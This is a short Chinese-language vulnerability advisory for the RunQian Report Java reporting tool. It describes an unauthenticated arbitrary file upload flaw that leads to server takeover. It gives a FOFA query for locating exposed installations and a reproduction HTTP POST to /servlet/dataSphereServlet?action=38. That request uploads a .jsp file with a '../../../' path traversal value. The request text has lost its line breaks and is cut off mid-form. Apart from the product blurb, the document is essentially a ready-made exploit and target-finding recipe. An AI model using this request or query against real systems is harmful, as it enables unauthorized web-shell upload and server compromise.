0x01 产品简介
润乾报表是一个纯JAVA的企业级报表工具,润乾报表作为领先的企业级报表分析软件,提供了高效的报表设计方案、强大的报表展现能力、灵活的部署机制,以及支持强关联语义模型。这些功能使得润乾报表能够为企业级数据分析与商业智能提供高性能、高效率的报表系统解决方案。
0x02 漏洞概述
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
0x03 测绘语句
fofa: body="润乾报表"
0x04 漏洞复现
POST /servlet/dataSphereServlet?action=38 HTTP/1.1Host:Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form-data; name="openGrpxFile"; filename="456.jsp"Content-Type: text/plain321--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form-data; name="path"../../../--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form